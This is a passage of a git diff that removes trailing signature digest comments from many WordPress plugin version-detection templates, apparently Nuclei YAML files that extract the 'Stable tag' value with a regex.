a/http/technologies/wordpress/plugins/fast-indexing-api.yaml b/http/technologies/wordpress/plugins/fast-indexing-api.yaml index fe6605ef79..2a1b0e57a9 100644 --- a/http/technologies/wordpress/plugins/fast-indexing-api.yaml +++ b/http/technologies/wordpress/plugins/fast-indexing-api.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022045028387d51452d9dd292f0cd89d3988a90b512581b0cb41687f6b6c63e1762202204768bb891142158bfc9694e2f89df4803548dcaf851839e94e11751404568af1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml index 5562422c04..df35e8b415 100644 --- a/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml +++ b/http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220141b3c44c36dec18cd5cf8ff0923ffb4fd0a0ce1ef846441be825fa92ff0887c02206d33bf3312fa4f2a21ff04fb35d8adcff41f5f3b4ea85331683db03c70171cd4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/flamingo.yaml b/http/technologies/wordpress/plugins/flamingo.yaml index a4d3920093..033cc4bc3d 100644 --- a/http/technologies/wordpress/plugins/flamingo.yaml +++ b/http/technologies/wordpress/plugins/flamingo.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100c6d0c781dadc38999555235fe560eace14eed131d3a39a0086b367de14aef9da02206648d71b8b69d6ebd3c6ee46f67086951d0d4dab6ea60ec9932e2aba44add4a6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluent-smtp.yaml b/http/technologies/wordpress/plugins/fluent-smtp.yaml index 33e2b97037..4a3dcbd210 100644 --- a/http/technologies/wordpress/plugins/fluent-smtp.yaml +++ b/http/technologies/wordpress/plugins/fluent-smtp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022000be16170ed47e29b8b7366b7cb1eac8bd10d1c7b87394712bf2c1d714236de002210094e56d61343fe454915065b8d3c11c859b0808b07e7aff9d181b2dd727749dfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/fluentform.yaml b/http/technologies/wordpress/plugins/fluentform.yaml index 2ee5ed0a10..945ab6ad03 100644 --- a/http/technologies/wordpress/plugins/fluentform.yaml +++ b/http/technologies/wordpress/plugins/fluentform.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201813910139681312b8aca80f92c4a94c9b60c1409da31c74b3e256cc4e831518022100f8bcd4057019dbc4af581e4b94a739e8402eabde3c5bb683f2c46211a9349d85:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/font-awesome.yaml b/http/technologies/wordpress/plugins/font-awesome.yaml index 7b7cde1ead..2072b51ab9 100644 --- a/http/technologies/wordpress/plugins/font-awesome.yaml +++ b/http/technologies/wordpress/plugins/font-awesome.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450221008422069f96e979ba2445298b6e4d0fd7652953c80ffe82be1713fdd4512e26fa0220639c5c21f7c92a2c58392a1cac76c0d9070e72591cd5197d672c3674148f7a07:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml index 2b894e8260..b509d8cc67 100644 --- a/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205755bab67c356c5c3b37a9a1ded30dd01f395bde3c6a0fc2a23061a42da2b081022100adb1ee4aa603f7a652c7e28dd9da2d459ec27cfc3204c90cf00f6b68008193fa:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/formidable.yaml b/http/technologies/wordpress/plugins/formidable.yaml index 99b60c0d02..c984479bde 100644 --- a/http/technologies/wordpress/plugins/formidable.yaml +++ b/http/technologies/wordpress/plugins/formidable.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004400237aa2306ef2d33235812b3d8211caeb87f4e4fffa1283ed828788cbf4f022100e6647e859243a8796f87487a31ead050d7881e03a4d3309c5a3e70135950e0f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/forminator.yaml b/http/technologies/wordpress/plugins/forminator.yaml index d2d33e70a2..a3870175c7 100644 --- a/http/technologies/wordpress/plugins/forminator.yaml +++ b/http/technologies/wordpress/plugins/forminator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100a8b8836654e1f904e8571679d41c4381d7db8f2187f414488f90178a4cb3ccba0220127874a8427042394c9ad32bf2f2378cef5a6323407b581ec4807fe8313380a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ga-google-analytics.yaml b/http/technologies/wordpress/plugins/ga-google-analytics.yaml index 747597fe24..f5f3818ea2 100644 --- a/http/technologies/wordpress/plugins/ga-google-analytics.yaml +++ b/http/technologies/wordpress/plugins/ga-google-analytics.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502206563f74fdc7289aa01f33e1e4e13d5b9b04fb9c354ba7ccca462f66583784e000221008a617378cffe449d7f34140cadac89ebe0576d362a7057476bab5f76d600f79c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml index 0156b96c0a..7e5b54c12c 100644 --- a/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml +++ b/http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502210089a7cf594ac15b59203112e1079f7e5d79e734dd29b7bb4d64c73038ceafe9cf0220667227832e0c8ac451c07a99420662f9f7987a63221fdb586b3882eeae13aaa2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml index 96dd740e48..59effd09f6 100644 --- a/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502203335336ce82488c544e4a3526ed55285b78dec6140a374491b9d240c9d21560b022100bd9ff8844226c8dcc0b90d0380075d8c831783c5b5ac3ce919036023e29b6f33:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml index 9cce25fb38..833207dcff 100644 --- a/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml +++ b/http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100c5cd0aee0d0ad42173e5efb8bcb9404ff4f2bc6ee08376ed44554a283f39fd0e022100a815d633e41e4bcde4f58128414cb6a5e7e64f69edcc6b40a39a10dee9ca7489:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml index 31041e3991..45260ccfba 100644 --- a/http/technologies/wordpress/plugins/google-listings-and-ads.yaml +++ b/http/technologies/wordpress/plugins/google-listings-and-ads.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210092a5a5b3a65d200cbaef3172dd567246fd693054723fdaa164edfda3e13a3420022100fd6d0af8ddea1d8b8355788ce2b4c3e86dc0a1b25e7d06799700add87b6c8f08:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-site-kit.yaml b/http/technologies/wordpress/plugins/google-site-kit.yaml index bb38fa074d..2131dbe751 100644 --- a/http/technologies/wordpress/plugins/google-site-kit.yaml +++ b/http/technologies/wordpress/plugins/google-site-kit.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200215bff7e2dfaf0ca23d8ce30bba181b7b3e15615657381ead57d5abe45760ff022100b845aec40f2cb0539fa1854baf568437a0befe0f371e4482ad10bfb9dd8aebb7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml index 3160138941..73d644c5e4 100644 --- a/http/technologies/wordpress/plugins/google-sitemap-generator.yaml +++ b/http/technologies/wordpress/plugins/google-sitemap-generator.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200eb21eb71677b02888c973ab210cbde34705205a2122f6caa24f5137cab3008c022100d2dea8c52f211de2f8eec6e4e08b5b5670084e6829d28cbd24f925dd486fb041:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gtranslate.yaml b/http/technologies/wordpress/plugins/gtranslate.yaml index 471a2a3420..7b0593dcb7 100644 --- a/http/technologies/wordpress/plugins/gtranslate.yaml +++ b/http/technologies/wordpress/plugins/gtranslate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d32c80d1bb55756ac9a2d5763b6cd2dad7ba7f27521b767fe9d9b47205a8d611022100cccf6fa2e1dddfe0d943f5d1fdfd9a5ddbf88fb5428bb9eb8387cf8bf086ec3b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/gutenberg.yaml b/http/technologies/wordpress/plugins/gutenberg.yaml index 653eb07637..6f65d087e4 100644 --- a/http/technologies/wordpress/plugins/gutenberg.yaml +++ b/http/technologies/wordpress/plugins/gutenberg.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022004dc8b2c191923e9d44268cf3c8b3689e839d4b075dd41229046c7d942469b8f02204cc2b00610d23d6d1ac91b1673a74bcaa21f3a34bd413bb12ad6ffa3e6f577a0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml index 7a69488010..783cdd283d 100644 --- a/http/technologies/wordpress/plugins/happy-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/happy-elementor-addons.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100ee3788b509ff21b9b0a12cf5acfd70278ed056ec132330957cc9608fa2863a3402203e7f0cc571ae68a66855becb8d42fcbd57b95d7bec7c83c68890c2b7c1b4868e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml index 42607b81fe..05121854b3 100644 --- a/http/technologies/wordpress/plugins/header-footer-code-manager.yaml +++ b/http/technologies/wordpress/plugins/header-footer-code-manager.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402202cbf0b7784d15313ce5d5f9173e2e76c31ed4c138488cca9c48c2675c549d51b02206f2bd2a80ca10339f62f16e911e5d7278ee57ec12600ddef76eee919de23499f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer-elementor.yaml b/http/technologies/wordpress/plugins/header-footer-elementor.yaml index 5874b7de07..72f52edcd4 100644 --- a/http/technologies/wordpress/plugins/header-footer-elementor.yaml +++ b/http/technologies/wordpress/plugins/header-footer-elementor.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502202d5a6028989e76b86e8f405107f784686c06f6ea5b0510285942ad0ef6068458022100e2c12b741672313c513dcf3913cbb65f79dfbe85b6d0bbfea0ded8850cec67d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/header-footer.yaml b/http/technologies/wordpress/plugins/header-footer.yaml index 6b90c6adcf..4cf45ebd74 100644 --- a/http/technologies/wordpress/plugins/header-footer.yaml +++ b/http/technologies/wordpress/plugins/header-footer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402205495d064328450f947e304882e24eb98d34b1e5b3237d968d715876e678aab6102203c7c25ae89debb59fdbcaed86e227e87722d79fbf948085b20a79fa84db955a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/health-check.yaml b/http/technologies/wordpress/plugins/health-check.yaml index 5be09a440c..3d6863e074 100644 --- a/http/technologies/wordpress/plugins/health-check.yaml +++ b/http/technologies/wordpress/plugins/health-check.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402203362eaa84c19aa9effdb58be55d876d78e4d261d89939b64d3c770920c156db90220499b53032c658e9d65c2d9c14a45b364c24f8d78a4f63727619cf9808a7e9230:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hello-dolly.yaml b/http/technologies/wordpress/plugins/hello-dolly.yaml index cf543e2f5b..79e2813c5e 100644 --- a/http/technologies/wordpress/plugins/hello-dolly.yaml +++ b/http/technologies/wordpress/plugins/hello-dolly.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100a822b8e885d31348620503a366c6827fc43bc2736149b488aaf5398ada891101022100cfa4b9c3970ebc686d4b4d5806c4c0714c1599247d7b581bbf1c0bcd12f0b8a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/host-webfonts-local.yaml b/http/technologies/wordpress/plugins/host-webfonts-local.yaml index e8cd51e9b7..ab9a0f1ae3 100644 --- a/http/technologies/wordpress/plugins/host-webfonts-local.yaml +++ b/http/technologies/wordpress/plugins/host-webfonts-local.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100899646fb58ca55c8af1573c73311c5cbc5020016efe3482f2451d24bbe643c9902201b046fd8deb15bb2772d064c055f52944b1adc85d145f5bb3415f66b04abeeeb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/hostinger.yaml b/http/technologies/wordpress/plugins/hostinger.yaml index 125c514436..5d3adf7c27 100644 --- a/http/technologies/wordpress/plugins/hostinger.yaml +++ b/http/technologies/wordpress/plugins/hostinger.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200603df7012a0c694d202df7193bf4e601887eb7da822edec2c3d42f355331e57022100f032752ad623260dea582c3625aa84d3d820e3e4a0f0ef8e935e79ec28f7d3a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/image-optimization.yaml b/http/technologies/wordpress/plugins/image-optimization.yaml index 21675ac7d0..fea9594fa0 100644 --- a/http/technologies/wordpress/plugins/image-optimization.yaml +++ b/http/technologies/wordpress/plugins/image-optimization.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022079e61d334f704133e6a213c0409f284951c534dad0b2297304351842e1fa634e02210087e043d171bb4e49da7073e885ba6c1f2cbd1faef25dc9ba09a27a2640fc7aa9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imagify.yaml b/http/technologies/wordpress/plugins/imagify.yaml index 9e0a2d2dc1..16dfc8df5f 100644 --- a/http/technologies/wordpress/plugins/imagify.yaml +++ b/http/technologies/wordpress/plugins/imagify.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a0048304602210096b7e852669276b39f1208b5fb15624b2f3fa0e8d51c6346927e55fd39227494022100d679a1e7d25c245e79fe99790436b5ab89a4b528d4566021e3098d14c8e7e107:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/imsanity.yaml b/http/technologies/wordpress/plugins/imsanity.yaml index 5ac7b893aa..4b7600ea69 100644 --- a/http/technologies/wordpress/plugins/imsanity.yaml +++ b/http/technologies/wordpress/plugins/imsanity.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502205047a1157073d472933296fc49207314ee572050ec791dd938af87e4dfca8232022100ce654a8ef8024fc46c749ae5b73b997726fa85c026cb5db4028fb61ef0d0ef5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml index cd9f0bd338..2ccd4dbce8 100644 --- a/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml +++ b/http/technologies/wordpress/plugins/insert-headers-and-footers.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d3a1f48d956ae2aaa39024dd6245e39be9d3b988440b442dccbe1fdee8fe5ecc022063076cfa9be5b35fd27b9cbc24926f445ad3d873d4b8b4939d914b9e9ba9291b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/instagram-feed.yaml b/http/technologies/wordpress/plugins/instagram-feed.yaml index e29e261f6e..02ceb224d1 100644 --- a/http/technologies/wordpress/plugins/instagram-feed.yaml +++ b/http/technologies/wordpress/plugins/instagram-feed.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100994d84c406d494d38dd5cd057bf210ac2ae4ae05b636e2d7d98b7ebd1cc335cc022100e1a5d4534c826821b07ff1a435d06615c0ffd9b7569dd801b57f5466dd221667:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml index 7afe144d9e..367d587ce2 100644 --- a/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220385c1811bcec6332300dd5df639f2843cedcb6d0508ec5760ce698c89f3abc0f02204c8d9a58a0961f17bac7b62ff3bc13d1a435c913ed8140d902754de661365051:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack-boost.yaml b/http/technologies/wordpress/plugins/jetpack-boost.yaml index d975042851..feed730ee0 100644 --- a/http/technologies/wordpress/plugins/jetpack-boost.yaml +++ b/http/technologies/wordpress/plugins/jetpack-boost.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d1081253d6776c448817050b6c41deae47288c6e4dc8f34c60325b31a0c6963e0221009fafe882a64f17a2381140294f4ac65b5f81f6aa889ac30091abe0c470e62782:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/jetpack.yaml b/http/technologies/wordpress/plugins/jetpack.yaml index 3e697f9431..9b2841e7ca 100644 --- a/http/technologies/wordpress/plugins/jetpack.yaml +++ b/http/technologies/wordpress/plugins/jetpack.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502200a947f1ac5fd707778e27cb39a1e61e13a8075a65f8d648b5e8b55f0de5ad57702210092824f1d4f9e13cfc187a1d7d9ba735658df72aa19499696ab4fbdde91ce4250:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kadence-blocks.yaml b/http/technologies/wordpress/plugins/kadence-blocks.yaml index fe90b06ab2..42be14c5df 100644 --- a/http/technologies/wordpress/plugins/kadence-blocks.yaml +++ b/http/technologies/wordpress/plugins/kadence-blocks.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a004730450220307d9dc73b2604f75c1e453e4e9e2eabfd85bc63bb880b5fa1762dd4dea7c5de022100b5bbb8749dc94405fb46d2ba07a55696c5e9485dc4ed8a9ce1c84b3baaf1eb1e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/kirki.yaml b/http/technologies/wordpress/plugins/kirki.yaml index 291f63f23d..4e0cd86c3f 100644 --- a/http/technologies/wordpress/plugins/kirki.yaml +++ b/http/technologies/wordpress/plugins/kirki.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100d953daada5684cef06ffd819d1602e6ee476f2bad0bb0adcc6849d84865afc2c022000fd3b6d82b4bef65000ae8232ff1452a59d6d2c04970125aecda2158d6d573b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/leadin.yaml b/http/technologies/wordpress/plugins/leadin.yaml index 8b9fc92729..59eadc5e6e 100644 --- a/http/technologies/wordpress/plugins/leadin.yaml +++ b/http/technologies/wordpress/plugins/leadin.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a00463044022057b1096098b14b4450f553467b3d9ec792d97e58731d9f27810ca0978dfa9d8a0220429ad9afc92a058d8fba49cb3e129666264d023c784b59e975e4f00164db265e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml index 3fd3339a92..41f7a0075e 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a004630440220110a0057d72abba78447ed768bda072efb31780d1f0a59074d1ca82a79c71d8702202cb1b8838b6cca1c90a9e24fa730f82b5ae4772bba7c01188b9d29d2526aa0dd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/limit-login-attempts.yaml b/http/technologies/wordpress/plugins/limit-login-attempts.yaml index 2dcf8c57dc..7e35a3fb4f 100644 --- a/http/technologies/wordpress/plugins/limit-login-attempts.yaml +++ b/http/technologies/wordpress/plugins/limit-login-attempts.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022100bdf58649ab6d9fbce27e4eb914a5dfaae4f005f4d9ccd38c6dd342a1712f936f02203cca14a4e6b708a212a5af06df3aa0dbb7dfdd4c4205fc3a2c8d5101bc9ecbca:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/litespeed-cache.yaml b/http/technologies/wordpress/plugins/litespeed-cache.yaml index b5adb7aec7..18c2a7586e 100644 --- a/http/technologies/wordpress/plugins/litespeed-cache.yaml +++ b/http/technologies/wordpress/plugins/litespeed-cache.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022004a757f6c2f0f1bfab7ea91d4b1e5bd8022e4bbaec0f5155cc2ce1cf44826b53022100db2633b1ddd771a21ef90597213a6e7d1b91fe9eb0023d78a3ae93d96ea34726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loco-translate.yaml b/http/technologies/wordpress/plugins/loco-translate.yaml index f5552cb020..6bc2aa78f9 100644 --- a/http/technologies/wordpress/plugins/loco-translate.yaml +++ b/http/technologies/wordpress/plugins/loco-translate.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100d794915171ea24e3e4bb0f70591cdd8026c16d873d0b7ce7b22077ddff4bd56a022100fcaf2c8bcd082964e2cb78f81113e6a2d15095abf7f5709b58c8eb98350181f0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/loginizer.yaml b/http/technologies/wordpress/plugins/loginizer.yaml index 71e4d8667c..a43d3352a2 100644 --- a/http/technologies/wordpress/plugins/loginizer.yaml +++ b/http/technologies/wordpress/plugins/loginizer.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402206f107ea871d0453868dfa520f0795b7fea1356df8384f46280fe55864c137b2a022044e6966b7eaf40e53770aa1b1c96815474478e24a9528e84935db1db3e546066:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 492dc3657a..e7db9944e4 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022048cf9a5d168fb9f888079eaff2139fc5121e8e9051f08b45ce91a2a50f6aa694022100c46377eae0fbb3603c7f7e619d335949fb33b8862813a4d77f3c37a8e459970f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index e48aaaf75a..268bd7b9df 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 490a0046304402200b0a84d55aa771b7112d157cb3c025f350b5e9526c857405c1fc7cd830a6424402201739b113256e797b47230d44d4c3b0b69147759cb36eb0f1a4def5b587509c01:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index 68e83b40db..d7fb2209d1 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a0047304502201c1f9df57540a1c8aa282acebd76ef06518061a87180dc2b85f0b11669a9b32e022100c7f1a65d3d42830272cd6961d4669b5d7b8835a21f58e6931ad1116856d5cc7e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 241b130bfe..a1641d4632 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4a0a00473045022025647f73e1f3dc64b9b845b17a00e71ffe624b89e0b752ba3764f16bf0b5b57c022100eedc0a2eafbff551a16b46b6c19c1ed48d0f7db7e164b2b71c8e96b77cbbd93a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 1efd2e346f..3b6542683c 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -46,4 +46,3 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' -# digest: 4b0a00483046022100e373449db06ecbc38d4995c4dc22aecea32e24a1990f9f0ff82744eca3c429b6022100b726937e91c3a9ba00a59af43e87c00c2b49f7e82c71375d7c198ca1005bc91e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git 